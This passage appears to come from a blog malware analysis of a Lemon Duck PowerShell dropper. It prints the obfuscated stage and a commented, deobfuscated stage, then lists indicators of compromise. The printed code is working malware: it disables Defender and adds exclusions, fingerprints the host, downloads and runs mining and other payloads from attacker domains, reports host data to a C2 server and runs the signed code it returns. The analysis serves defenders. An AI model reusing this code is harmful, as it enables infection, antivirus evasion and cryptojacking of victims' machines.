271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
( (('F2Eis64=[int]([IntPtr]:'+':Size -eq 8)
F2Eifbin=JGAif.binJGA
F2Eifmd5=JGA04f9fd'+'d312702343f0'+'74e5dd9a1ffe6fJGA
F2Ekrbin=JGAkr.binJGA
F2Ekrmd5=JGAb7a1cfd74661361f71856388dac5aaa6JGA
if(F2Ei'+'s64){
F2Embin=JGAm6.binJGA
F2Emmd5=JGA32390a001e1207eafdd66e35c5'+'5aa9d3JGA
F2Emgbin=JGAm6g.binJGA
F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA
}
function gmd5(F2Ed){
[Security.Cryptography'+'.MD5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}
'+'return F2El
}
function getrname(){
F2Erpath=JGAC:q5EWindowsq5ES'+'ystem32q5EWindowspowershellq5EV1.0JGA
F2Eenames = gci JGAF2Erpathq5E*JGA -Include *.exe -Exclude powershell.exeWdnforeach{F2E_.name}
F2Etmd'+'5 = gmd5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5Epowershell.exeJGA))
'+' foreach(F2Eename in F2Eenames){
'+' F2Emd5_=gm'+'d5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5EF2EenameJGA))
if(F2Etmd5 -eq F2Emd5_){
'+' return F2E'+'ename'+'
}
}
F2Eename=-join([char[]](48..57+65..90+97..12'+'2)WdnGet'+'-Random -Count (6+(Get-Random)%6)) + JGA.exeJGA
copy-item JGAF2E'+'rpathq5Epowershe'+'ll.exeJGA JGAF2Erpathq5EF2EenameJGAWdnout-null
if(!(test-path '+'JGAF2Erpathq5EF2EenameJGA)){F2Eename=JG'+'Apo'+'wershell.exeJGA}
return'+' F2Eename
}
F2Erename=getrname
F2Elifmd5,F2Elmmd5,F2'+'Elkrmd5=JGAJGA,JGAJGA,JGAJGA
try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}
try{F'+'2Elmmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EmbinJGA))}catch{}
try{F2Elkrmd5=gmd5'+' ([IO.File]::ReadAl'+'lByt'+'es(JGAF2Ee'+'n'+'v:t'+'mpq5EF2EkrbinJGA))}catch{}
F2Edown_url = JGAhttp://d.u78wjd'+'u.'+'comJGA
if(!F2Eurl){F2Eurl=JGAhttp://t.bb3u9.comJGA}
F2Ecore_url = F2Eurl.split(JGA/JGA)[0..2]-joinJGA/JGA
F2Epermit = ([Security.Principal.WindowsPrincipal][Security.P'+'rincipal.WindowsIdentity]::GetCur'+'rent()).IsInRole([Security.Principal.W'+'indowsBuiltInRole'+'] JGAAdministratorJGA)
F2Ecomp_name = F2Eenv:COMPUTERNAME
F2Eguid = (get-wmiobject Win32_ComputerSyste'+'mProduct).UUID
F2Emac = (Get-WmiObject Win32_NetworkAdapterConfigur'+'ati'+'on Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firs'+'t 1
F'+'2Eosb = (Get-Wm'+'iObject -class Win32_OperatingSystem)
F2Eos = F2Eosb.Caption.replace(J'+'GAMicrosoft Windows JGA,JGAJ'+'GA)+JGA_JGA+F2Eosb.Version
F2Euser = F2Eenv:USERNAME
'+'F2Edomain = (Get-WmiObjec'+'t win32_comput'+'ersyst'+'em).Domain
F2Euptime = [timespan]::FromMilliseconds([environment]::TickCount)Wdnforeach{F2E_.totalseconds}
F2Ecpuname = (get-wmiobject '+'win32_processor).name
F2Ecard = (Get-WmiObject Win32_VideoController).name
F2Ecpu_per = JGAF2E((Get-WmiObject'+' -'+'Class Win32_Pr'+'ocessor).LoadPercentage)JGA
gwmi Win32_Physical'+'Memory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2Em'+'sum/1Gb
try{
F2Edrive = ([system.IO.DriveInfo]::GetDrives('+') '+'Wdn where {F2E_.IsReady -and (F2E_.AvailableFreeSpace -gt 1024) -and ((F2E_.DriveType -'+'eq JGARemovableJGA) -or (F2E_.DriveType -eq JGANetworkJGA)) -and ((F2E_.DriveFormat -eq JGANTFSJGA) -or (F2E_.DriveFormat -eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+'+'(F2E_.Dr'+'iveType.tostring())[0]})-joinJGAWdnJGA}catch{}
try{
[Reflection.Assembly]::LoadWithPar'+'tialName(JGASystem.Web.Extension'+'sJGA)
F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xw'+'-objd0xect net.webcd0xlient).JGAdownloadstring'+'JGA(E2Dhttp://127.0.0.1:43669/1/summaryE2D))
F2Emv=F2Eobj.version
F2Emip=F2Eobj.connection.ip
'+'
'+'F2Emhr=F2Eobj.hashrate.t'+'otal-join(E2D,E2D)}catch{}
try{
Set-MpPrefe'+'rence -DisableR'+'ealtimeMonitoring 1
Add-MpPreference -ExclusionPath c:q5E
Add-MpPreference -Exclusi'+'onProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShell'+'q5Ev1.0q5Ep'+'owershell.exe'+'
Add-M'+'pPreference -ExclusionProcess c:q5Ewindowsq5Esystem32q5'+'EWindowsPowe'+'rShellq5Ev1.0q5EF2Ere'+'name
'+'}catch{}
'+'
if((F2Ecard -match '+'JGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}
if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}
F2Ev=F2Eurl.split(JGA?JGA)[1]
F2Eparams=@(F2Ev,F2Ecomp_name,F2Egui'+'d,F2Emac)-joinJGA&JGA
set-loca'+'tion F2Eenv:tmp
funct'+'ion s'+'tp(F2Egra){
write-host F'+'2Egra
Start-Process -FilePath cmd.exe -ArgumentList JGA/c F2EgraJGA
}
function gcf(F2'+'Ecode,F2Emd,F2Efn){
(E2Decho E2D+F2Ecode+E2D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2Eenv:tmp+E'+'2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url='+'E2DE2DE'+'2D+F2Edow'+'n_url+E2DE2DE2D'+';function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().ComputeHash(F2E'+'con)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};return F2'+'Es}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp);F2Emd5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect Net'+'.WebCd0xlient).downloaddata('+'F2Edown_url+E2D'+'E2D/E2D+F2Efn+E2D?E2D+F2Eparams+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et-eqF2Eifmd5){[System.IO.File]::WriteA'+'llBytes(F2Eifp,F2Econ)}el'+'se{F2Enoup=1}'+'}if('+'F2Enoup){F2Econ=F2Econ_;F2Eifmd5=F2Emd5_}E2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&E2D,E2D^^^&E2D'+')
}
function gpa(F2Efnam,F2Ename){
(E2Dfor(F2Ei'+'=0;F2Ei -lt F2Econ.count'+'-1;F2Ei+=1){if(F2Econ[F2Ei] -eq 0x0a){brea'+'k}};id0xex(-join[char[]]F2Econ[0..F2Ei]);F2Ebin=(New'+'-Object IO.BinaryReader(New-Object System.IO.Co'+'mpression.GzipStream (New-Ob'+'ject System.IO.MemoryStream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), '+'([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000)'+';F2Ebin_=F2Ebin.Clone();F2Emep=F2Eenv:tmp+'+'E2DE2DE2D+JGA'+'q5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::WriteAllBytes(F2Emep,F2Ebin_+((1..127)WdnGet-Random -Count 100));test1 -PEBytes F2EbinE2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&'+'E2D,E2D^^^&E2D)+JGAWdnF'+'2Ename - &cmd /c copy /y %tmp'+'%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA
}
func'+'tion gpb(F2Ename'+'){
E2DId0xEX(-join[char[]]F2Econ)WdnE2D+F2Ename+E2D -E2D
}
function gcode(F2Efl) {
E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Eflase;New-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocalE2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+E2D)}catch{}E2D
}
F2E'+'code1=gcode JGAIfJGA
Id0xEx F2Ecode1
if(F2ElocalIf){
st'+'p ((gcf F2Ecode1 F2Eifmd'+'5 F2Eifbin)+(gpb F2Erename))
}
if(F2Eis64){
F2E'+'c'+'ode2=gcode JGATMnJGA
Id0xEx F2Ecode2
if'+'(F2ElocalTMn){
stp ((gcf F2Ecode2 F2Emm'+'d5 F2Embin)+(gpa F2Embin F2Erename))
}
}
if((F2Eisn -or F2Eisa) -and F2Eis64){
F2Ecode3=gcode JGATMngJG'+'A
Id0xEx F2Ecode3
if(F2ElocalTMng){
stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emgbin'+' F2Erename))
}
}
F2Ecode4=gcod'+'e JGAKrJGA
Id0xEx F2Ecode4
if(F2ElocalKr){
stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb '+'F2Erename))
}
stp ('+'E2Decho try{F2Es=[System.Ne'+'t.Sockets.TcpListener]65529;F2Es.start();while(1){}}catch{}WdnE2D+F2Eren'+'ame+E2D -E2D)
F2Econf_f=test-path c:q5Ewindowsq5Esystem32q5EWindowsPowerSh'+'ellq5Ev1.0q5Econfi'+'gXXX1.json
F2Elmip=[System.Net.Dns]::GetHostAddresses(JGAp.b69kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }
F2Etpid,F2Etpname=(ge'+'t-'+'processWdnsort cpu -Descendin'+'gWdnselect-object'+' -first 1Wdnfore'+'ach{F2E_.id,F'+'2E_.processname})
F2Etcpconn = NetStat -anop TCP
F2Eipport=JGAJGA
foreach(F2Et in F2Etcpconn){
F2Eline = F2Et.s'+'plit(E2D E2D)Wdn ? {F2E_}
if (F2Eline'+' -eq F'+'2Enull) { continue }
if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2Etpid)){
F2Eipport = F2Eline[2]
break
}
}
try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@(E2D'+'8.8.8.8E2D,'+'E2D9.9.9.9E2D))}catch{}
F2Epar'+'ams+=JGA&JGA+(@(F'+'2Eos,[Int]F2Eis64,F2E'+'user,F2Edomain,F2E'+'drive,F2Ecpuname,F2Ecard'+',F2Emem,F2Ecpu_per,[In'+'t'+']F2Epermit,('+'F2Elifmd5'+'[0..5]-jo'+'inJGAJGA),(F2Elmmd5['+'0..5]-joinJGAJGA),(F2Elkrmd'+'5[0..'+'5]-joinJGAJGA),F2'+'Emv,F2Emip,F2Emhr'+',F2Euptim'+'e,[Int]F2Econf_f,F2Elmip,F2Etpna'+'me,F2Eipport,JGA0.9JGA)-joinJGA&JGA)
function SIEX {
Param(
[string]F2Eurl
)
try{
F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient
F2Efinalurl = JGAF2EurlJGA+JGA?JGA+JGAF2EparamsJGA
'+'try{
F2Ewebclient'+'.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.re'+'place(E2D'+'q5EE2D,E2D-E2D))
} catch{}
F2Eres_bytes = F2Ewebclient.DownloadData('+'F2Efinalurl)
if(F2Eres_bytes.count -gt 173){
F2Esign_bytes = F2Eres'+'_bytes[0..171];
'+'F2Eraw_byte'+'s = F2Eres_bytes[173..F2Eres_bytes.count];
F2'+'ErsaParams = New-Object System.Security.Cryptograph'+'y.RSAParameters
F2ErsaParams.Modulus = 0xda,0x65,0xa8,0xd'+'7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,'+'0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0x'+'d1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x'+'34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6'+',0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0x'+'ea,0x38,0xb7,0x47,0x6b,0x5d
F2Er'+'saParams.Expon'+'ent = 0x01,0x00,0x01
F2Ers'+'a = New-Object -Ty'+'peName System.Security.Cryptography.RSACryptoServiceProvider;
F2Ersa.ImportP'+'arameters(F2ErsaParams)
F'+'2Ebas'+'e64 = -join([char[]]F2E'+'sign_bytes)
F2EbyteArray = [convert]::FromBase64String(F2Ebase64)
F2Esha1 = New-Object Syst'+'em.Secu'+'rity.Cryptography.SHA1CryptoServiceProvider
if(F2Ersa.verifyData(F2Eraw_bytes,F2Esha1,F2EbyteArray)) {
I'+'EX (-join[char[]]F2Eraw_bytes)
}
}
} catch{}
}
Start'+'-Sleep -Seconds 3
SIEX JGAF2Ecore_url/report.jspJGA
')-rEplAcE ([cHaR]87+[cHaR]100+[cHaR]110),[cHaR]124 -rEplAcE'E2D',[cHaR]39 -rEplAcE ([cHaR]70+[cHaR]50+[cHaR]69),[cHaR]36-crEPLAcE([cHaR]100+[cHaR]48+[cHaR]120),[cHaR]96-crEPLAcE'JGA',[cHaR]34 -rEplAcE ([cHaR]113+[cHaR]53+[cHaR]69),[cHaR]92) )
There is another layer of obsfucation here, so Malware Developer add various layer of absfucation in order to evade various AntiVirus products. Let’s Deobsfucate this layer.
Stage 4
This layer looks like some powershell code, I formatted it and added few comments as well.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
# Checking the architecture wheather 64 bit or not
$is64=[int]([IntPtr]::Size -eq 8)
# Defining md5 hash of some if.bin and kr.bin file
#-------------------------------------block1--------------------
$ifbin="if.bin"
$ifmd5="04f9fdd312702343f074e5dd9a1ffe6f"
$krbin="kr.bin"
$krmd5="b7a1cfd74661361f71856388dac5aaa6"
#-------------------------------------block1--------------------
# If victim host is 64 bit then define some more md5 hash
if($is64){
$mbin="m6.bin"
$mmd5="32390a001e1207eafdd66e35c55aa9d3"
$mgbin="m6g.bin"
$mgmd5="26c0d79a29223e96ae52cb2775c96813"
}
# This function simply generates MD5 sum of input
function gmd5($d){
[Security.Cryptography.MD5]::Create().ComputeHash($d)| foreach{ $l+=$_.ToString('x2')}
return $l
}
# This file generates a random name and copies powershell file with that name
function getrname(){
$rpath="C:\Windows\System32\Windowspowershell\V1.0"
$enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name}
$tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe"))
foreach($ename in $enames){
$md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename"))
if($tmd5 -eq $md5_){
return $ename
}
}
$ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"
copy-item "$rpath\powershell.exe" "$rpath\$ename"|out-null
if(!(test-path "$rpath\$ename")){
$ename="powershell.exe"
}
return $ename
}
# Generated random name of powershell.exe file
$rename=getrname
# initializing some values
$lifmd5,$lmmd5,$lkrmd5="","",""
# This block checks if the binaries, if.bin, kr.bin, m.bin exist and if they do then calculated their MD5 sum
#---------------------------block2----------------------
try{
$lifmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$ifbin"))
}
catch{}
try{
$lmmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$mbin"))
}
catch{}
try{
$lkrmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$krbin"))
}
catch{}
#---------------------------block2----------------------
# This block defines some URLs varibles.
#-------------------URLs--------------------
$down_url = "http://d.u78wjdu.com"
if(!$url){
$url="http://t.bb3u9.com"
}
$core_url = $url.split("/")[0..2]-join"/"
#-------------------URLs--------------------
# Checks if user has admin privelages
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
# This block finds information about the host machine like , name, mac address, os version, usernmae, domain, graphic card, RAM etc
#---------------------------------------block 3----------------------------------------
$comp_name = $env:COMPUTERNAME
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$osb = (Get-WmiObject -class Win32_OperatingSystem)
$os = $osb.Caption.replace("Microsoft Windows ","")+"_"+$osb.Version
$user = $env:USERNAME
$domain = (Get-WmiObject win32_computersystem).Domain
$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}
$cpuname = (get-wmiobject win32_processor).name
$card = (Get-WmiObject Win32_VideoController).name
$cpu_per = "$((Get-WmiObject -Class Win32_Processor).LoadPercentage)"
gwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };$mem=$msum/1Gb
try{
$drive = ([system.IO.DriveInfo]::GetDrives() | where {$_.IsReady -and ($_.AvailableFreeSpace -gt 1024) -and (($_.DriveType -eq "Removable") -or ($_.DriveType -eq "Network")) -and (($_.DriveFormat -eq "NTFS") -or ($_.DriveFormat -eq "FAT32"))} | foreach{($_.Name)[0]+"_"+($_.DriveType.tostring())[0]})-join"|"
}
catch{}
#---------------------------------------block 3----------------------------------------
# This checks if it can downloads data from localhost port 43669 and if it can then it sets some variables
try{
[Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
$obj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((new-object net.webclient)."downloadstring"('http://127.0.0.1:43669/1/summary'))
$mv=$obj.version
$mip=$obj.connection.ip
$mhr=$obj.hashrate.total-join(',')
}
catch{}
# Then it tries to disable Defender's RealTimeMonitoring, and then Excludes C drive from scanning and also Excludes Powershell process and the renamed version of powershell process from scanning (This only works if run as admin, thus it is in try block )
try{
Set-MpPreference -DisableRealtimeMonitoring 1
Add-MpPreference -ExclusionPath c:\
Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\$rename
}
catch{}
# Identifies the vendor of Graphic card
if(($card -match "GTX|NVIDIA|GEFORCE")){
$isn=1
}
if(($card -match "Radeon|AMD")){
$isa=1
}
# Creates a URL parameter by joining Comp Name and MAC
$v=$url.split("?")[1]
$params=@($v,$comp_name,$guid,$mac)-join"&"
# Goes to temp Directory
set-location $env:tmp
# A function to start process
function stp($gra){
write-host $gra
Start-Process -FilePath cmd.exe -ArgumentList "/c $gra"
}
function gcf($code,$md,$fn){
('echo '+$code+';
$ifmd5='''+$md+''';
$ifp=$env:tmp+''\'+$fn+''';
$down_url='''+$down_url+''';
function gmd5($con){
[System.Security.Cryptography.MD5]::Create().ComputeHash($con) | foreach{$s+=$_.ToString(''x2'')};
return $s
}
if(test-path $ifp){
$con_=[System.IO.File]::ReadAllBytes($ifp);
$md5_=gmd5 $con_;
if($md5_-eq$ifmd5){
$noup=1
}
}
if(!$noup){
$con=(New-Object Net.WebClient).downloaddata($down_url+''/'+$fn+'?'+$params+''');
$t=gmd5 $con;
if($t-eq$ifmd5){
[System.IO.File]::WriteAllBytes($ifp,$con)
}
else{
$noup=1
}
}
if($noup){
$con=$con_;
$ifmd5=$md5_
}').replace('|','^^^|').replace('&','^^^&')
}
function gpa($fnam,$name){
('for($i=0;$i -lt $con.count-1;$i+=1){
if($con[$i] -eq 0x0a){
break
}
};
iex(-join[char[]]$con[0..$i]);
$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);
$bin_=$bin.Clone();
$mep=$env:tmp+'''+"\$fnam.ori"+''';
[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));
test1 -PEBytes $bin'
).replace('|','^^^|').replace('&','^^^&')+"|$name - &cmd /c copy /y %tmp%\$fnam.ori %tmp%\$fnam.exe & %tmp%\$fnam.exe"
}
function gpb($name){
'IEX(-join[char[]]$con)|'+$name+' -'
}
function gcode($fl) {
'try{
$local'+$fl+'=$flase;
New-Object Threading.Mutex($true,''Global\eLocal'+$fl+''',[ref]$local'+$fl+')
}
catch{}'
}
$code1=gcode "If"
IEx $code1
if($localIf){
stp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))
}
if($is64){
$code2=gcode "TMn"
IEx $code2
if($localTMn){
stp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))
}
}
if(($isn -or $isa) -and $is64){
$code3=gcode "TMng"
IEx $code3
if($localTMng){
stp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))
}
}
$code4=gcode "Kr"
IEx $code4
if($localKr){
stp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))
}
stp ('echo try{
$s=[System.Net.Sockets.TcpListener]65529;
$s.start();
while(1){}
}
catch{}|'+$rename+' -')
$conf_f=test-path c:\windows\system32\WindowsPowerShell\v1.0\configXXX1.json
$lmip=[System.Net.Dns]::GetHostAddresses("p.b69kq.com") | foreach {echo $_.IPAddressToString }
$tpid,$tpname=(get-process|sort cpu -Descending|select-object -first 1|foreach{$_.id,$_.processname})
$tcpconn = NetStat -anop TCP
$ipport=""
foreach($t in $tcpconn){
$line = $t.split(' ')| ? {$_}
if ($line -eq $null) {
continue
}
if($t.contains("ESTABLISHED") -and ($line[-1] -eq $tpid)){
$ipport = $line[2]
break
}
}
try{
(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))
}
catch{}
$params+="&"+(@($os,[Int]$is64,$user,$domain,$drive,$cpuname,$card,$mem,$cpu_per,[Int]$permit,($lifmd5[0..5]-join""),($lmmd5[0..5]-join""),($lkrmd5[0..5]-join""),$mv,$mip,$mhr,$uptime,[Int]$conf_f,$lmip,$tpname,$ipport,"0.9")-join"&")
function SIEX {
Param([string]$url)
try{
$webclient = New-Object Net.WebClient
$finalurl = "$url"+"?"+"$params"
try{
$webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('\','-'))
}
catch{}
$res_bytes = $webclient.DownloadData($finalurl)
if($res_bytes.count -gt 173){
$sign_bytes = $res_bytes[0..171];
$raw_bytes = $res_bytes[173..$res_bytes.count];
$rsaParams = New-Object System.Security.Cryptography.RSAParameters
$rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xd1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6,0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xea,0x38,0xb7,0x47,0x6b,0x5d
$rsaParams.Exponent = 0x01,0x00,0x01
$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;
$rsa.ImportParameters($rsaParams)
$base64 = -join([char[]]$sign_bytes)
$byteArray = [convert]::FromBase64String($base64)
$sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
if($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {
IEX (-join[char[]]$raw_bytes)
}
}
}
catch{}
}
Start-Sleep -Seconds 3
SIEX "$core_url/report.jsp"
IOC
IOC (Indicators Of Compromise) are pieces of data, such as data found in log entries or files, that identify potentially malicious activity on a system or network, This IOC helps in identifying the systems which might be affected by the malware, for example, if malware communicates with an external IP address, then any system that requested that particular IP address is considered to be infected by malware.
So In this malware the potential IOC’c are:
- Any HTTP requests made to “hxxps[://]t[.]zz3ro[.]com”, “hxxps[://]t[.]zker9[.]com” or “hxxps[://]t[.]bb3u9[.]com” (URLs are defanged, to prevent any accidental click)
- Presence of scheduled task, with name as blackball, or with same random names.
- Presence of some open ports like pot no. 65529
- Presence of an event with the name blackball
- Automatically uninstalled some antiviruses
You can get the scripts that i extracted and the IOC’s we dertermined from this github repository
Thanks for Reading, Stay tuned for more ❤︎
If you enjoyed reading the article do follow me on: